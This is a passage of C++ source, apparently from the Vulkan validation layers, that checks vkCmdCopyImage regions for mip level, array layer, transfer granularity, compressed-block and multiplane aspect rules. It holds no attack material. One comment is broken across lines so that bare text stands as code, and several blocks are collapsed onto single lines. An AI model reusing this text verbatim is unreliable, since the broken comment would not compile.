                            "%s: pRegion[%d].%s (w=%d, h=%d, d=%d) dimensions must be even integer multiples of this command "
                            "buffer's queue family image transfer granularity (w=%d, h=%d, d=%d) or offset (x=%d, y=%d, z=%d) + "
                            "extent (w=%d, h=%d, d=%d) must match the image subresource extents (w=%d, h=%d, d=%d).",
                            function, i, member, extent->width, extent->height, extent->depth, granularity->width,
                            granularity->height, granularity->depth, offset->x, offset->y, offset->z, extent->width,
                            extent->height, extent->depth, subresource_extent->width, subresource_extent->height,
                            subresource_extent->depth);
        }
    }
    return skip;
}

// Flags an error if a region's mip level is outside the image's mip range.
bool CoreChecks::ValidateImageMipLevel(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img, uint32_t mip_level,
                                       const uint32_t i, const char *function, const char *member, const char *vuid) {
    bool skip = false;
    if (mip_level >= img->createInfo.mipLevels) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                        HandleToUint64(cb_node->commandBuffer), vuid,
                        "In %s, pRegions[%u].%s.mipLevel is %u, but provided image %s has %u mip levels.", function, i, member,
                        mip_level, report_data->FormatHandle(img->image).c_str(), img->createInfo.mipLevels);
    }
    return skip;
}

// Flags an error if a region's [baseArrayLayer, baseArrayLayer + layerCount) range exceeds the image's array layers.
bool CoreChecks::ValidateImageArrayLayerRange(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img, const uint32_t base_layer,
                                              const uint32_t layer_count, const uint32_t i, const char *function,
                                              const char *member, const char *vuid) {
    bool skip = false;
    if (base_layer >= img->createInfo.arrayLayers || layer_count > img->createInfo.arrayLayers ||
        (base_layer + layer_count) > img->createInfo.arrayLayers) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                        HandleToUint64(cb_node->commandBuffer), vuid,
                        "In %s, pRegions[%u].%s.baseArrayLayer is %u and .layerCount is "
                        "%u, but provided image %s has %u array layers.",
                        function, i, member, base_layer, layer_count, report_data->FormatHandle(img->image).c_str(),
                        img->createInfo.arrayLayers);
    }
    return skip;
}

// Check
valid usage Image Transfer Granularity requirements for elements of a VkBufferImageCopy structure
bool CoreChecks::ValidateCopyBufferImageTransferGranularityRequirements(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img,
                                                                        const VkBufferImageCopy *region, const uint32_t i,
                                                                        const char *function, const char *vuid) {
    bool skip = false;
    VkExtent3D granularity = GetScaledItg(cb_node, img);
    skip |= CheckItgOffset(cb_node, &region->imageOffset, &granularity, i, function, "imageOffset", vuid);
    VkExtent3D subresource_extent = GetImageSubresourceExtent(img, &region->imageSubresource);
    skip |= CheckItgExtent(cb_node, &region->imageExtent, &region->imageOffset, &granularity, &subresource_extent,
                           img->createInfo.imageType, i, function, "imageExtent", vuid);
    return skip;
}

// Check valid usage Image Transfer Granularity requirements for elements of a VkImageCopy structure
bool CoreChecks::ValidateCopyImageTransferGranularityRequirements(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *src_img,
                                                                  const IMAGE_STATE *dst_img, const VkImageCopy *region,
                                                                  const uint32_t i, const char *function) {
    bool skip = false;
    // Source image checks
    VkExtent3D granularity = GetScaledItg(cb_node, src_img);
    skip |= CheckItgOffset(cb_node, &region->srcOffset, &granularity, i, function, "srcOffset",
                           "VUID-vkCmdCopyImage-srcOffset-01783");
    VkExtent3D subresource_extent = GetImageSubresourceExtent(src_img, &region->srcSubresource);
    const VkExtent3D extent = region->extent;
    skip |= CheckItgExtent(cb_node, &extent, &region->srcOffset, &granularity, &subresource_extent,
                           src_img->createInfo.imageType, i, function, "extent", "VUID-vkCmdCopyImage-srcOffset-01783");

    // Destination image checks
    granularity = GetScaledItg(cb_node, dst_img);
    skip |= CheckItgOffset(cb_node, &region->dstOffset, &granularity, i, function, "dstOffset",
                           "VUID-vkCmdCopyImage-dstOffset-01784");
    // Adjust dest extent, if necessary
    const VkExtent3D dest_effective_extent =
        GetAdjustedDestImageExtent(src_img->createInfo.format, dst_img->createInfo.format, extent);
    subresource_extent = GetImageSubresourceExtent(dst_img, &region->dstSubresource);
    skip |= CheckItgExtent(cb_node, &dest_effective_extent, &region->dstOffset, &granularity, &subresource_extent,
                           dst_img->createInfo.imageType, i, function, "extent", "VUID-vkCmdCopyImage-dstOffset-01784");
    return skip;
}

// Validate contents of a VkImageCopy struct
bool CoreChecks::ValidateImageCopyData(const uint32_t regionCount, const VkImageCopy *ic_regions, const IMAGE_STATE *src_state,
                                       const IMAGE_STATE *dst_state) {
    bool skip = false;

    for (uint32_t i = 0; i < regionCount; i++) {
        const VkImageCopy region = ic_regions[i];

        // For comp<->uncomp copies, the copy extent for the dest image must be adjusted
        const VkExtent3D src_copy_extent = region.extent;
        const VkExtent3D dst_copy_extent =
            GetAdjustedDestImageExtent(src_state->createInfo.format, dst_state->createInfo.format, region.extent);

        bool slice_override = false;
        uint32_t depth_slices = 0;

        // Special case for copying between a 1D/2D array and a 3D image
        // TBD: This seems like the only way to reconcile 3 mutually-exclusive VU checks for 2D/3D copies. Heads up.
if ((VK_IMAGE_TYPE_3D == src_state->createInfo.imageType) && (VK_IMAGE_TYPE_3D != dst_state->createInfo.imageType)) { depth_slices = region.dstSubresource.layerCount; // Slice count from 2D subresource slice_override = (depth_slices != 1); } else if ((VK_IMAGE_TYPE_3D == dst_state->createInfo.imageType) && (VK_IMAGE_TYPE_3D != src_state->createInfo.imageType)) { depth_slices = region.srcSubresource.layerCount; // Slice count from 2D subresource slice_override = (depth_slices != 1); } // Do all checks on source image // if (src_state->createInfo.imageType == VK_IMAGE_TYPE_1D) { if ((0 != region.srcOffset.y) || (1 != src_copy_extent.height)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-00146", "vkCmdCopyImage(): pRegion[%d] srcOffset.y is %d and extent.height is %d. For 1D images these must " "be 0 and 1, respectively.", i, region.srcOffset.y, src_copy_extent.height); } } // VUID-VkImageCopy-srcImage-01785 if ((src_state->createInfo.imageType == VK_IMAGE_TYPE_1D) && ((0 != region.srcOffset.z) || (1 != src_copy_extent.depth))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-01785", "vkCmdCopyImage(): pRegion[%d] srcOffset.z is %d and extent.depth is %d. For 1D images " "these must be 0 and 1, respectively.", i, region.srcOffset.z, src_copy_extent.depth); } // VUID-VkImageCopy-srcImage-01787 if ((src_state->createInfo.imageType == VK_IMAGE_TYPE_2D) && (0 != region.srcOffset.z)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-01787", "vkCmdCopyImage(): pRegion[%d] srcOffset.z is %d. 
For 2D images the z-offset must be 0.",
                            i, region.srcOffset.z);
        }

        // Array-layer restrictions for a 3D source image: a 3D image has no array layers, so the
        // subresource must select baseArrayLayer 0 / layerCount 1.  With maintenance1 the rule is
        // keyed off the source image alone; pre-maintenance1 it applies when either image is 3D.
        if (GetDeviceExtensions()->vk_khr_maintenance1) {
            if (src_state->createInfo.imageType == VK_IMAGE_TYPE_3D) {
                if ((0 != region.srcSubresource.baseArrayLayer) || (1 != region.srcSubresource.layerCount)) {
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                    HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-00141",
                                    "vkCmdCopyImage(): pRegion[%d] srcSubresource.baseArrayLayer is %d and srcSubresource.layerCount "
                                    "is %d. For VK_IMAGE_TYPE_3D images these must be 0 and 1, respectively.",
                                    i, region.srcSubresource.baseArrayLayer, region.srcSubresource.layerCount);
                }
            }
        } else {  // Pre maint 1
            if (src_state->createInfo.imageType == VK_IMAGE_TYPE_3D || dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) {
                if ((0 != region.srcSubresource.baseArrayLayer) || (1 != region.srcSubresource.layerCount)) {
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                    HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-00141",
                                    "vkCmdCopyImage(): pRegion[%d] srcSubresource.baseArrayLayer is %d and "
                                    "srcSubresource.layerCount is %d. For copies with either source or dest of type "
                                    "VK_IMAGE_TYPE_3D, these must be 0 and 1, respectively.",
                                    i, region.srcSubresource.baseArrayLayer, region.srcSubresource.layerCount);
                }
            }
        }

        // Source checks that apply only to compressed images (or to _422 images if ycbcr enabled)
        bool ext_ycbcr = GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion;
        if (FormatIsCompressed(src_state->createInfo.format) ||
            (ext_ycbcr && FormatIsSinglePlane_422(src_state->createInfo.format))) {
            const VkExtent3D block_size = FormatTexelBlockExtent(src_state->createInfo.format);
            // image offsets must be multiples of block dimensions
            if ((SafeModulo(region.srcOffset.x, block_size.width) != 0) ||
                (SafeModulo(region.srcOffset.y, block_size.height) != 0) ||
                (SafeModulo(region.srcOffset.z, block_size.depth) != 0)) {
                const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01727" : "VUID-VkImageCopy-srcOffset-00157";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(src_state->image), vuid,
                                "vkCmdCopyImage(): pRegion[%d] srcOffset (%d, %d) must be multiples of the compressed image's "
                                "texel width & height (%d, %d).",
                                i, region.srcOffset.x, region.srcOffset.y, block_size.width, block_size.height);
            }

            // Extent width must be a multiple of block width, or extent+offset width must equal subresource width
            const VkExtent3D mip_extent = GetImageSubresourceExtent(src_state, &(region.srcSubresource));
            if ((SafeModulo(src_copy_extent.width, block_size.width) != 0) &&
                (src_copy_extent.width + region.srcOffset.x != mip_extent.width)) {
                const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01728" : "VUID-VkImageCopy-extent-00158";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(src_state->image), vuid,
                                "vkCmdCopyImage(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block "
                                "width (%d), or when added to srcOffset.x (%d) must equal the image subresource width (%d).",
                                i, src_copy_extent.width, block_size.width, region.srcOffset.x, mip_extent.width);
            }

            // Extent height must be a multiple of block height, or extent+offset height must equal subresource height
            if ((SafeModulo(src_copy_extent.height, block_size.height) != 0) &&
                (src_copy_extent.height + region.srcOffset.y != mip_extent.height)) {
                const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01729" : "VUID-VkImageCopy-extent-00159";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(src_state->image), vuid,
                                "vkCmdCopyImage(): pRegion[%d] extent height (%d) must be a multiple of the compressed texture block "
                                "height (%d), or when added to srcOffset.y (%d) must equal the image subresource height (%d).",
                                i, src_copy_extent.height, block_size.height, region.srcOffset.y, mip_extent.height);
            }

            // Extent depth must be a multiple of block depth, or extent+offset depth must equal subresource depth
            // NOTE(review): the message text below says "extent width" although depth values are reported.
            uint32_t copy_depth = (slice_override ? depth_slices : src_copy_extent.depth);
            if ((SafeModulo(copy_depth, block_size.depth) != 0) && (copy_depth + region.srcOffset.z != mip_extent.depth)) {
                const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01730" : "VUID-VkImageCopy-extent-00160";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(src_state->image), vuid,
                                "vkCmdCopyImage(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block "
                                "depth (%d), or when added to srcOffset.z (%d) must equal the image subresource depth (%d).",
                                i, src_copy_extent.depth, block_size.depth, region.srcOffset.z, mip_extent.depth);
            }
        }  // Compressed

        // Do all checks on dest image
        //
        if (dst_state->createInfo.imageType == VK_IMAGE_TYPE_1D) {
            if ((0 != region.dstOffset.y) || (1 != dst_copy_extent.height)) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(dst_state->image), "VUID-VkImageCopy-dstImage-00152",
                                "vkCmdCopyImage(): pRegion[%d] dstOffset.y is %d and dst_copy_extent.height is %d. For 1D images "
                                "these must be 0 and 1, respectively.",
                                i, region.dstOffset.y, dst_copy_extent.height);
            }
        }

        // VUID-VkImageCopy-dstImage-01786
        if ((dst_state->createInfo.imageType == VK_IMAGE_TYPE_1D) && ((0 != region.dstOffset.z) || (1 != dst_copy_extent.depth))) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(dst_state->image), "VUID-VkImageCopy-dstImage-01786",
                            "vkCmdCopyImage(): pRegion[%d] dstOffset.z is %d and extent.depth is %d. For 1D images these must be 0 "
                            "and 1, respectively.",
                            i, region.dstOffset.z, dst_copy_extent.depth);
        }

        // VUID-VkImageCopy-dstImage-01788
        if ((dst_state->createInfo.imageType == VK_IMAGE_TYPE_2D) && (0 != region.dstOffset.z)) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(dst_state->image), "VUID-VkImageCopy-dstImage-01788",
                            "vkCmdCopyImage(): pRegion[%d] dstOffset.z is %d. For 2D images the z-offset must be 0.",
                            i, region.dstOffset.z);
        }

        // NOTE(review): this unconditional 3D-dest layer check duplicates the maintenance1 branch below and
        // reuses the *src* VUID string ("VUID-VkImageCopy-srcImage-00141") for a dest-subresource failure —
        // looks like copy/paste; confirm against the current VUID tables before changing.
        if (dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) {
            if ((0 != region.dstSubresource.baseArrayLayer) || (1 != region.dstSubresource.layerCount)) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(dst_state->image), "VUID-VkImageCopy-srcImage-00141",
                                "vkCmdCopyImage(): pRegion[%d] dstSubresource.baseArrayLayer is %d and dstSubresource.layerCount "
                                "is %d. For VK_IMAGE_TYPE_3D images these must be 0 and 1, respectively.",
                                i, region.dstSubresource.baseArrayLayer, region.dstSubresource.layerCount);
            }
        }

        // VU01199 changed with mnt1
        if (GetDeviceExtensions()->vk_khr_maintenance1) {
            if (dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) {
                if ((0 != region.dstSubresource.baseArrayLayer) || (1 != region.dstSubresource.layerCount)) {
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                    HandleToUint64(dst_state->image), "VUID-VkImageCopy-srcImage-00141",
                                    "vkCmdCopyImage(): pRegion[%d] dstSubresource.baseArrayLayer is %d and dstSubresource.layerCount "
                                    "is %d. For VK_IMAGE_TYPE_3D images these must be 0 and 1, respectively.",
                                    i, region.dstSubresource.baseArrayLayer, region.dstSubresource.layerCount);
                }
            }
        } else {  // Pre maint 1
            if (src_state->createInfo.imageType == VK_IMAGE_TYPE_3D || dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) {
                if ((0 != region.dstSubresource.baseArrayLayer) || (1 != region.dstSubresource.layerCount)) {
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                    HandleToUint64(dst_state->image), "VUID-VkImageCopy-srcImage-00141",
                                    "vkCmdCopyImage(): pRegion[%d] dstSubresource.baseArrayLayer is %d and "
                                    "dstSubresource.layerCount is %d. For copies with either source or dest of type "
                                    "VK_IMAGE_TYPE_3D, these must be 0 and 1, respectively.",
                                    i, region.dstSubresource.baseArrayLayer, region.dstSubresource.layerCount);
                }
            }
        }

        // Dest checks that apply only to compressed images (or to _422 images if ycbcr enabled)
        if (FormatIsCompressed(dst_state->createInfo.format) ||
            (ext_ycbcr && FormatIsSinglePlane_422(dst_state->createInfo.format))) {
            const VkExtent3D block_size = FormatTexelBlockExtent(dst_state->createInfo.format);
            // image offsets must be multiples of block dimensions
            if ((SafeModulo(region.dstOffset.x, block_size.width) != 0) ||
                (SafeModulo(region.dstOffset.y, block_size.height) != 0) ||
                (SafeModulo(region.dstOffset.z, block_size.depth) != 0)) {
                const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-dstImage-01731" : "VUID-VkImageCopy-dstOffset-00162";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(dst_state->image), vuid,
                                "vkCmdCopyImage(): pRegion[%d] dstOffset (%d, %d) must be multiples of the compressed image's "
                                "texel width & height (%d, %d).",
                                i, region.dstOffset.x, region.dstOffset.y, block_size.width, block_size.height);
            }

            // Extent width must be a multiple of block width, or dst_copy_extent+offset width must equal subresource width
            const VkExtent3D mip_extent = GetImageSubresourceExtent(dst_state, &(region.dstSubresource));
            if ((SafeModulo(dst_copy_extent.width, block_size.width) != 0) &&
                (dst_copy_extent.width + region.dstOffset.x != mip_extent.width)) {
                const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-dstImage-01732" : "VUID-VkImageCopy-extent-00163";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(dst_state->image), vuid,
                                "vkCmdCopyImage(): pRegion[%d] dst_copy_extent width (%d) must be a multiple of the compressed texture "
                                "block width (%d), or when added to dstOffset.x (%d) must equal the image subresource width (%d).",
                                i, dst_copy_extent.width, block_size.width, region.dstOffset.x, mip_extent.width);
            }

            // Extent height must be a multiple of block height, or dst_copy_extent+offset height must equal subresource height
            if ((SafeModulo(dst_copy_extent.height, block_size.height) != 0) &&
                (dst_copy_extent.height + region.dstOffset.y != mip_extent.height)) {
                const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-dstImage-01733" : "VUID-VkImageCopy-extent-00164";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(dst_state->image), vuid,
                                "vkCmdCopyImage(): pRegion[%d] dst_copy_extent height (%d) must be a multiple of the compressed "
                                "texture block height (%d), or when added to dstOffset.y (%d) must equal the image subresource "
                                "height (%d).",
                                i, dst_copy_extent.height, block_size.height, region.dstOffset.y, mip_extent.height);
            }

            // Extent depth must be a multiple of block depth, or dst_copy_extent+offset depth must equal subresource depth
            uint32_t copy_depth = (slice_override ? depth_slices : dst_copy_extent.depth);
            if ((SafeModulo(copy_depth, block_size.depth) != 0) && (copy_depth + region.dstOffset.z != mip_extent.depth)) {
                const char *vuid = ext_ycbcr ?
"VUID-VkImageCopy-dstImage-01734" : "VUID-VkImageCopy-extent-00165"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] dst_copy_extent width (%d) must be a multiple of the compressed texture " "block depth (%d), or when added to dstOffset.z (%d) must equal the image subresource depth (%d).", i, dst_copy_extent.depth, block_size.depth, region.dstOffset.z, mip_extent.depth); } } // Compressed } return skip; } // vkCmdCopyImage checks that only apply if the multiplane extension is enabled bool CoreChecks::CopyImageMultiplaneValidation(VkCommandBuffer command_buffer, const IMAGE_STATE *src_image_state, const IMAGE_STATE *dst_image_state, const VkImageCopy region) { bool skip = false; // Neither image is multiplane if ((!FormatIsMultiplane(src_image_state->createInfo.format)) && (!FormatIsMultiplane(dst_image_state->createInfo.format))) { // If neither image is multi-plane the aspectMask member of src and dst must match if (region.srcSubresource.aspectMask != region.dstSubresource.aspectMask) { std::stringstream ss; ss << "vkCmdCopyImage(): Copy between non-multiplane images with differing aspectMasks ( 0x" << std::hex << region.srcSubresource.aspectMask << " and 0x" << region.dstSubresource.aspectMask << " )"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01551", "%s.", ss.str().c_str()); } } else { // Source image multiplane checks uint32_t planes = FormatPlaneCount(src_image_state->createInfo.format); VkImageAspectFlags aspect = region.srcSubresource.aspectMask; if ((2 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR)) { std::stringstream ss; ss << "vkCmdCopyImage(): Source image aspect mask (0x" << std::hex << aspect << ") is invalid for 2-plane format"; skip |= 
log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01552", "%s.", ss.str().c_str()); } if ((3 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_2_BIT_KHR)) { std::stringstream ss; ss << "vkCmdCopyImage(): Source image aspect mask (0x" << std::hex << aspect << ") is invalid for 3-plane format"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01553", "%s.", ss.str().c_str()); } // Single-plane to multi-plane if ((!FormatIsMultiplane(src_image_state->createInfo.format)) && (FormatIsMultiplane(dst_image_state->createInfo.format)) && (VK_IMAGE_ASPECT_COLOR_BIT != aspect)) { std::stringstream ss; ss << "vkCmdCopyImage(): Source image aspect mask (0x" << std::hex << aspect << ") is not VK_IMAGE_ASPECT_COLOR_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstImage-01557", "%s.", ss.str().c_str()); } // Dest image multiplane checks planes = FormatPlaneCount(dst_image_state->createInfo.format); aspect = region.dstSubresource.aspectMask; if ((2 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR)) { std::stringstream ss; ss << "vkCmdCopyImage(): Dest image aspect mask (0x" << std::hex << aspect << ") is invalid for 2-plane format"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstImage-01554", "%s.", ss.str().c_str()); } if ((3 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_2_BIT_KHR)) { 
std::stringstream ss; ss << "vkCmdCopyImage(): Dest image aspect mask (0x" << std::hex << aspect << ") is invalid for 3-plane format"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstImage-01555", "%s.", ss.str().c_str()); } // Multi-plane to single-plane if ((FormatIsMultiplane(src_image_state->createInfo.format)) && (!FormatIsMultiplane(dst_image_state->createInfo.format)) && (VK_IMAGE_ASPECT_COLOR_BIT != aspect)) { std::stringstream ss; ss << "vkCmdCopyImage(): Dest image aspect mask (0x" << std::hex << aspect << ") is not VK_IMAGE_ASPECT_COLOR_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01556", "%s.", ss.str().c_str()); } } return skip; } bool CoreChecks::PreCallValidateCmdCopyImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); bool skip = false; skip = ValidateImageCopyData(regionCount, pRegions, src_image_state, dst_image_state); VkCommandBuffer command_buffer = cb_node->commandBuffer; for (uint32_t i = 0; i < regionCount; i++) { const VkImageCopy region = pRegions[i]; // For comp/uncomp copies, the copy extent for the dest image must be adjusted VkExtent3D src_copy_extent = region.extent; VkExtent3D dst_copy_extent = GetAdjustedDestImageExtent(src_image_state->createInfo.format, dst_image_state->createInfo.format, region.extent); bool slice_override = false; uint32_t depth_slices = 0; // Special case for copying between a 1D/2D array and a 3D image // TBD: This seems like the only way to reconcile 3 mutually-exclusive VU checks for 2D/3D copies. Heads up. 
if ((VK_IMAGE_TYPE_3D == src_image_state->createInfo.imageType) &&
            (VK_IMAGE_TYPE_3D != dst_image_state->createInfo.imageType)) {
            depth_slices = region.dstSubresource.layerCount;  // Slice count from 2D subresource
            slice_override = (depth_slices != 1);
        } else if ((VK_IMAGE_TYPE_3D == dst_image_state->createInfo.imageType) &&
                   (VK_IMAGE_TYPE_3D != src_image_state->createInfo.imageType)) {
            depth_slices = region.srcSubresource.layerCount;  // Slice count from 2D subresource
            slice_override = (depth_slices != 1);
        }

        // Subresource sanity: mip level and layer range of both subresources must exist in their images
        skip |= ValidateImageSubresourceLayers(cb_node, &region.srcSubresource, "vkCmdCopyImage", "srcSubresource", i);
        skip |= ValidateImageSubresourceLayers(cb_node, &region.dstSubresource, "vkCmdCopyImage", "dstSubresource", i);
        skip |= ValidateImageMipLevel(cb_node, src_image_state, region.srcSubresource.mipLevel, i, "vkCmdCopyImage",
                                      "srcSubresource", "VUID-vkCmdCopyImage-srcSubresource-01696");
        skip |= ValidateImageMipLevel(cb_node, dst_image_state, region.dstSubresource.mipLevel, i, "vkCmdCopyImage",
                                      "dstSubresource", "VUID-vkCmdCopyImage-dstSubresource-01697");
        skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, region.srcSubresource.baseArrayLayer,
                                             region.srcSubresource.layerCount, i, "vkCmdCopyImage", "srcSubresource",
                                             "VUID-vkCmdCopyImage-srcSubresource-01698");
        skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, region.dstSubresource.baseArrayLayer,
                                             region.dstSubresource.layerCount, i, "vkCmdCopyImage", "dstSubresource",
                                             "VUID-vkCmdCopyImage-dstSubresource-01699");

        if (GetDeviceExtensions()->vk_khr_maintenance1) {
            // No chance of mismatch if we're overriding depth slice count
            if (!slice_override) {
                // The number of depth slices in srcSubresource and dstSubresource must match
                // Depth comes from layerCount for 1D,2D resources, from extent.depth for 3D
                uint32_t src_slices = (VK_IMAGE_TYPE_3D == src_image_state->createInfo.imageType ? src_copy_extent.depth
                                                                                                : region.srcSubresource.layerCount);
                uint32_t dst_slices = (VK_IMAGE_TYPE_3D == dst_image_state->createInfo.imageType ? dst_copy_extent.depth
                                                                                                : region.dstSubresource.layerCount);
                if (src_slices != dst_slices) {
                    std::stringstream ss;
                    ss << "vkCmdCopyImage(): number of depth slices in source and destination subresources for pRegions[" << i
                       << "] do not match";
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                    HandleToUint64(command_buffer), "VUID-VkImageCopy-extent-00140", "%s.", ss.str().c_str());
                }
            }
        } else {
            // For each region the layerCount member of srcSubresource and dstSubresource must match
            if (region.srcSubresource.layerCount != region.dstSubresource.layerCount) {
                std::stringstream ss;
                ss << "vkCmdCopyImage(): number of layers in source and destination subresources for pRegions[" << i
                   << "] do not match";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                HandleToUint64(command_buffer), "VUID-VkImageCopy-extent-00140", "%s.", ss.str().c_str());
            }
        }

        // Do multiplane-specific checks, if extension enabled
        if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) {
            skip |= CopyImageMultiplaneValidation(command_buffer, src_image_state, dst_image_state, region);
        }

        if (!GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) {
            // not multi-plane, the aspectMask member of srcSubresource and dstSubresource must match
